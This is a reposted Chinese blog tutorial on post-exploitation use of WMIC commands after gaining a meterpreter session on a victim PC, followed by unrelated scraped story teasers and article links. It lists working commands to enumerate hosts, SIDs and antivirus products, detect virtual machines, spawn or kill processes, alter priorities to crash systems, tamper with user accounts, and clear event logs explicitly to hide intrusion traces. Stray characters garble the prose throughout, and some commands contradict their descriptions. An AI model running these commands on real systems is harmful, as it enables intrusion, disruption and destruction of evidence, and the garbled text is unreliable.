實(shí)用的后滲透wmic命令

寫在前面的話

在這篇文章中贱傀,我們將討論如何在攻擊的后滲透利用階段使用WMIC(Windows Management InstrumentationCommand Line)掌唾。當(dāng)攻擊者在遠(yuǎn)程PC上拿到meterpreter會話之后睹晒,他們就可以枚舉大量的系統(tǒng)信息呀非,并利用WMI命令行工具來進(jìn)行更深程度的操作前联。

首先翔曲,我們會介紹如何拿到遠(yuǎn)程PC的meterpreter會話。拿到會話之后漫玄,我們還會告訴大家如何提權(quán)至管理員權(quán)限茄蚯。

WMIC命令行可以通過Windows CMD來訪問压彭,直接在meterpreter shell中輸入“shell“即可。接下來渗常,我們一起看一看WMIC命令以及相應(yīng)的工作機(jī)制壮不。

WMIC

下面這個(gè)命令可以查看WMIC命令的全局選項(xiàng),WMIC全局選項(xiàng)可以用來設(shè)置WMIC環(huán)境的各種屬性皱碘,通過結(jié)合各種全局選項(xiàng)以及參數(shù)询一,我們就可以通過WMIC環(huán)境來管理整個(gè)系統(tǒng)了。

wmic /?

獲取系統(tǒng)角色癌椿、用戶名和制造商

銅鼓WMIC命令的操作系統(tǒng)指令健蕊,我們可以枚舉出大量關(guān)于目標(biāo)系統(tǒng)的信息,包括主機(jī)名踢俄、域名缩功、制造商以及設(shè)備型號等等。

我們還可以添加下列過濾器來獲取更精準(zhǔn)的掃描結(jié)果:

Roles:它可以給我們提供目標(biāo)設(shè)備在整個(gè)網(wǎng)絡(luò)系統(tǒng)中所扮演的角色都办,例如工作站嫡锌、服務(wù)器或個(gè)人PC等等。

Manufacturer:它可以給我們提供目標(biāo)系統(tǒng)的制造商和設(shè)備型號琳钉,因?yàn)槟承┨囟ㄖ圃焐趟a(chǎn)的特定型號設(shè)備會存在特定的漏洞势木,因此我們可以利用這部分信息來尋找存在漏洞的設(shè)備。

UserName:它可以給我們返回系統(tǒng)的用戶名歌懒,我們可以利用這部分信息來區(qū)分誰是管理員誰是普通用戶啦桌。

[/format:list]:以列表格式輸出數(shù)據(jù)并排列。

wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles/format:list

獲取SID

為了枚舉出SID及皂,我們需要用到WMIC的group選項(xiàng):

wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

如下圖所示甫男,我們已經(jīng)查找到了賬戶名、域名躲庄、本地組成員狀態(tài)查剖、SID以及相應(yīng)的狀態(tài):

創(chuàng)建一個(gè)進(jìn)程

WMIC命令的process選項(xiàng)可以幫助我們在目標(biāo)用戶的系統(tǒng)中創(chuàng)建各種進(jìn)程。這種功能可以幫助我們創(chuàng)建后門噪窘,或占用大量目標(biāo)系統(tǒng)的內(nèi)存:

wmic process call create “[Process Name]”

wmic process call create “taskmgr.exe”

你可以從下圖中看到笋庄,這個(gè)命令不僅會創(chuàng)建一個(gè)進(jìn)程,而且還會賦予相應(yīng)的進(jìn)程ID倔监,所以我們就可以根據(jù)我們的需要來修改進(jìn)程信息了直砂。

注意:如果進(jìn)程創(chuàng)建了一個(gè)類似任務(wù)管理器和CMD這樣的窗口,那么這條命令將會在目標(biāo)系統(tǒng)中打開這個(gè)窗口浩习,這樣會引起目標(biāo)用戶的懷疑静暂。

修改進(jìn)程優(yōu)先級

WMIC命令的process選項(xiàng)還可以幫我們修改目標(biāo)系統(tǒng)中運(yùn)行進(jìn)程的優(yōu)先級,這是一個(gè)非常有用的功能谱秽。降低某個(gè)進(jìn)程的優(yōu)先級可能會導(dǎo)致特定的應(yīng)用程序發(fā)生崩潰洽蛀,而提升某個(gè)進(jìn)程的優(yōu)先級甚至還會導(dǎo)致整個(gè)系統(tǒng)發(fā)生崩潰摹迷。

wmic process where name=”explorer.exe” call set priority 64

終止進(jìn)程

WMIC命令還可以幫我們終止目標(biāo)系統(tǒng)正在運(yùn)行的進(jìn)程:

wmic process where name=”explorer.exe” call terminate

獲取可執(zhí)行文件列表

下面的命令可以枚舉出整個(gè)系統(tǒng)中所有可執(zhí)行文件的路徑地址:

wmic process where “NOT ExecutablePath LIKE ‘%Windows%’” GET ExecutablePath

獲取目錄屬性

WMIC命令的fsdir選項(xiàng)可以提取目標(biāo)系統(tǒng)中文件目錄的基本信息,其中包括壓縮方法郊供、創(chuàng)建日期峡碉、文件大小、是否可讀寫驮审、是否為系統(tǒng)文件鲫寄、加密狀態(tài)以及加密類型等等:

wmic fsdir where=”drive=’c:’ and filename=’test’” get /format:list’

獲取文件屬性

WMIC命令的datafile選項(xiàng)可以獲取目標(biāo)系統(tǒng)中文件的基本信息,其中包括壓縮方法疯淫、創(chuàng)建日期地来、文件大小、是否可讀寫熙掺、是否為系統(tǒng)文件未斑、加密狀態(tài)以及加密類型等等:

wmic datafile where=’[Path of File]’ get /format:list

wmic datafile where name=’c:\\windows\\system32\\demo\\demo.txt’ get /format:list

定位系統(tǒng)文件

WMIC可以提取出所有重要系統(tǒng)文件的路徑,例如temp目錄和win目錄等等:

wmic environment get Description, VariableValue

獲取已安裝的應(yīng)用程序列表

wmic product get name

獲取正在運(yùn)行的服務(wù)列表

獲取到正在運(yùn)行的服務(wù)列表之后适掰,WMIC還可以提供服務(wù)的啟動模式颂碧,例如“自動”荠列、“手動”和“運(yùn)行中”:

wmic service where (state=”running”) get caption, name, startmode

獲取系統(tǒng)驅(qū)動詳情

sysdrive選項(xiàng)可以枚舉出驅(qū)動的名稱类浪、路徑和服務(wù)類型等數(shù)據(jù):

wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

獲取操作系統(tǒng)詳情

os選項(xiàng)可以列舉出目標(biāo)系統(tǒng)的上一次啟動時(shí)間、注冊的用戶數(shù)量肌似、處理器數(shù)量费就、物理/虛擬內(nèi)存信息和安裝的操作系統(tǒng)類型等等:

wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate,NumberofProcesses, NumberofUsers, Organization, RegisteredUsers, Status/format:list

獲取主板信息和BIOS序列號

wmic baseboard, get Manufacturer, Product, SerialNumber, Version

wmic bios, get serialNumber

獲取內(nèi)存緩存數(shù)據(jù)

memcache選項(xiàng)可以獲取到內(nèi)存緩存名和塊大小等信息:

wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

獲取內(nèi)存芯片信息

memorychip選項(xiàng)可以獲取到RAM的相關(guān)信息,例如序列號等等:

wmic memorychip get PartNumber, SerialNumber

判斷目標(biāo)系統(tǒng)是否為虛擬機(jī)

我們可以根據(jù)onboarddevice選項(xiàng)返回的信息來判斷目標(biāo)系統(tǒng)到底是真實(shí)的主機(jī)操作系統(tǒng)川队,還是一臺虛擬機(jī)(VMware或Virtual Box):

wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list

用戶賬號管理

鎖定用戶賬號

我們可以使用useraccount選項(xiàng)來鎖定本地用戶賬號:

wmic useraccount where name=’demo’ set disabled=false

用戶賬號重命名

wmic useraccount where name=’demo’ rename hacker

限制用戶修改密碼

我們還可以限制本地用戶的密碼修改操作:

wmic useraccount where name=’hacker’ set passwordchangeable=false

獲取反病毒產(chǎn)品詳情

我們可以枚舉出目標(biāo)系統(tǒng)安裝的反病毒產(chǎn)品信息力细,包括安裝位置和版本:

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

清理系統(tǒng)日志

WMIC命令的nteventlog選項(xiàng)還可以清除系統(tǒng)的日志記錄,當(dāng)你入侵了某個(gè)系統(tǒng)之后固额,這個(gè)命令可以幫助你掩蓋攻擊痕跡:

wmic nteventlog where filename='[logfilename]’ cleareventlog

wmic nteventlog where filename=’system’ cleareventlog

*參考來源:hackingarticles眠蚂,

轉(zhuǎn)載原文來自:https://blog.csdn.net/discover2210212455/article/details/82711930

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市斗躏,隨后出現(xiàn)的幾起案子逝慧,更是在濱河造成了極大的恐慌,老刑警劉巖啄糙,帶你破解...
    沈念sama閱讀 218,941評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件笛臣,死亡現(xiàn)場離奇詭異,居然都是意外死亡隧饼,警方通過查閱死者的電腦和手機(jī)沈堡,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來燕雁,“玉大人诞丽,你說我怎么就攤上這事鲸拥。” “怎么了僧免?”我有些...
    開封第一講書人閱讀 165,345評論 0 356
  • 文/不壞的土叔 我叫張陵崩泡,是天一觀的道長。 經(jīng)常有香客問我猬膨,道長角撞,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,851評論 1 295
  • 正文 為了忘掉前任勃痴,我火速辦了婚禮谒所,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘沛申。我一直安慰自己劣领,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,868評論 6 392
  • 文/花漫 我一把揭開白布铁材。 她就那樣靜靜地躺著尖淘,像睡著了一般。 火紅的嫁衣襯著肌膚如雪著觉。 梳的紋絲不亂的頭發(fā)上村生,一...
    開封第一講書人閱讀 51,688評論 1 305
  • 那天,我揣著相機(jī)與錄音饼丘,去河邊找鬼趁桃。 笑死,一個(gè)胖子當(dāng)著我的面吹牛肄鸽,可吹牛的內(nèi)容都是我干的卫病。 我是一名探鬼主播,決...
    沈念sama閱讀 40,414評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼典徘,長吁一口氣:“原來是場噩夢啊……” “哼蟀苛!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起逮诲,我...
    開封第一講書人閱讀 39,319評論 0 276
  • 序言:老撾萬榮一對情侶失蹤帜平,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后汛骂,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體罕模,經(jīng)...
    沈念sama閱讀 45,775評論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,945評論 3 336
  • 正文 我和宋清朗相戀三年帘瞭,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了淑掌。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,096評論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡蝶念,死狀恐怖抛腕,靈堂內(nèi)的尸體忽然破棺而出芋绸,到底是詐尸還是另有隱情,我是刑警寧澤担敌,帶...
    沈念sama閱讀 35,789評論 5 346
  • 正文 年R本政府宣布摔敛,位于F島的核電站,受9級特大地震影響全封,放射性物質(zhì)發(fā)生泄漏马昙。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,437評論 3 331
  • 文/蒙蒙 一刹悴、第九天 我趴在偏房一處隱蔽的房頂上張望行楞。 院中可真熱鬧,春花似錦土匀、人聲如沸子房。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽证杭。三九已至,卻和暖如春妒御,著一層夾襖步出監(jiān)牢的瞬間解愤,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評論 1 271
  • 我被黑心中介騙來泰國打工携丁, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留琢歇,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,308評論 3 372
  • 正文 我出身青樓梦鉴,卻偏偏與公主長得像,于是被迫代替她去往敵國和親揭保。 傳聞我的和親對象是個(gè)殘疾皇子肥橙,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,037評論 2 355

推薦閱讀更多精彩內(nèi)容

  • 1. 中斷命令執(zhí)行 Ctrl + Z 2. 文件/目錄 cd 切換目錄 例:cd // 顯示當(dāng)前目錄 例:...
    皓皓amous閱讀 668評論 0 0
  • SSRF漏洞是如何產(chǎn)生的? SSRF(Server-Side Request Forgery:服務(wù)器端請求偽造) ...
    BerL1n閱讀 57,542評論 1 21
  • 寫在前面秸侣,如果面對復(fù)雜的動畫效果你一籌莫展存筏,不煩看看這篇文章:LottieAndroid使用詳解及源碼解析—輕而易...
    Moninn閱讀 9,471評論 30 409
  • 1、垂直對齊 如果你用CSS味榛,則你會有困惑:我該怎么垂直對齊容器中的元素椭坚?現(xiàn)在,利用CSS3的Transform搏色,...
    kiddings閱讀 3,166評論 0 11
  • 推薦指數(shù): 6.0 書籍主旨關(guān)鍵詞:特權(quán)善茎、焦點(diǎn)、注意力频轿、語言聯(lián)想垂涯、情景聯(lián)想 觀點(diǎn): 1.統(tǒng)計(jì)學(xué)現(xiàn)在叫數(shù)據(jù)分析烁焙,社會...
    Jenaral閱讀 5,721評論 0 5